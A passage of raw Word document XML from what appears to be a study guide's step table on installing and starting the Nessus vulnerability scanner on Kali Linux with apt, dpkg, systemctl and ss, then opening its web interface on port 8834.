            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22AD8E58" w14:textId="77777777" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="475C6564" w14:textId="77777777" w:rsidR="0049571F" w:rsidRDefault="0049571F" w:rsidP="0049571F"/>
    <w:p w14:paraId="71715361" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665"/>
    <w:p w14:paraId="1DC0F9EE" w14:textId="0F40DDF4" w:rsidR="00B74665" w:rsidRDefault="00B74665">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC8B0A" w14:textId="774ECABE" w:rsidR="00690494" w:rsidRDefault="00690494" w:rsidP="00690494">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Installing</w:t>
      </w:r>
      <w:r w:rsidR="002024A0">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9184F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r w:rsidR="003C2CC4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276437">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B9184F">
        <w:t xml:space="preserve">System and Network </w:t>
      </w:r>
      <w:r w:rsidR="003C2CC4">
        <w:t>Vulnerability Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00276437">
        <w:t>)</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B74665" w14:paraId="6E5C74EE" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="39C984CB" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="02F8200A" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nessus</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00024ABC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">(We’re </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">not </w:t>
            </w:r>
            <w:r w:rsidRPr="00024ABC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>downloading the entire tool yet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03F1CD45" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r w:rsidRPr="00690494">
              <w:t>Prior to downloading Nessus, ensure that Kali Linux installation is up to date:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="7C748363" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6BFECD61" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2919E7C5" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="61DD28D6" w14:textId="478F49CD" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>Navigate to the downloads page of Tenable (Nessus’ company) and download the file:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AC797D">
              <w:t>https://www.tenable.com/downloads/nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="2FDF8B18" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1CE17184" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0FCC94DF" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dpkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3677E02A" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t xml:space="preserve">Use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">dpkg </w:t>
            </w:r>
            <w:r>
              <w:t>command to install the Debian package:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> dpkg </w:t>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Nessus-8.15.0-debian6 amd64.deb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A01341">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
              <w:t>Install option</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D74311">
              <w:t>(The file may have a new name if it’s a different version).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="3E4054A1" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2DE7D769" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="323F99C2" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>systemctl</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A01341">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(The Nessus daemon binds to tcp port 8834)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CFA6D4F" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>After package installation, we need to start the necessary service:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> systemctl </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">enable </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nessus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> systemctl </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">start </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE6097">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nessus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A01341">
              <w:t>We can then look to confirm nessus is started and running:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A01341">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01341">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">status </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01341">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nessusd.service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="0BA360FA" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="44FB71AA" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7D44640A" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43BED94E" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>We can use the ss command (a utility to dump socket statistics, similar to netstat):</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>q</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ss</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">| grep </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>8834</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-a</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show listening and non</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-n</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show exact bandwidth</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57733">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-t</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show tcp sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="2F344E4B" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="15CC0FEB" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="508B6D95" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>web interface</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A548BE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Can use any web browser)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FF7C459" w14:textId="77777777" w:rsidR="00B74665" w:rsidRPr="00E02E51" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t xml:space="preserve">Visit your IP and port number in your web browser (use </w:t>
            </w:r>
            <w:r w:rsidRPr="00A548BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ifconfig </w:t>
            </w:r>
            <w:r>
              <w:t>to check IP):</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A548BE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://YOUR.IP.ADD.RESS:8834/</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">(If there’s a warning, don’t worry, accept the risk and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>continue:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> select ‘continue’).</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Sign up with Nessus to get an activation code; Nessus Essentials is a free version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="10856372" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="04AC636C" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>21.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="646EE758" w14:textId="77777777" w:rsidR="00B74665" w:rsidRPr="00526770" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00526770">
              <w:t>nessus</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B9184F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Remember, nessus is not installed by default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DAE1541" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>Once the activation code has been submitted, it will take time to download Nessus fully, including its files, plugins and utilities needed to run.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Nessus features include:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">    Vulnerability Scanning</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Asset Discovery</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Network Scanning</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7222DF" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t xml:space="preserve">    Vulnerability Assessment</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Prioritization</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Policy Management</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B0B10F" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t xml:space="preserve">    Web Scanning</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Keep in mind that Host-based IPS (HIPS) will block ‘malicious’ tcp/udp traffic and thus interfere with nessus from working.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="2BC49F17" w14:textId="77777777" w:rsidTr="00B74665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6844BB78" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2FD8C722" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A5C2358" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E56DE93" w14:textId="77777777" w:rsidR="00E06803" w:rsidRDefault="00E06803">
      <w:r>
        <w:br w:type="page"/>
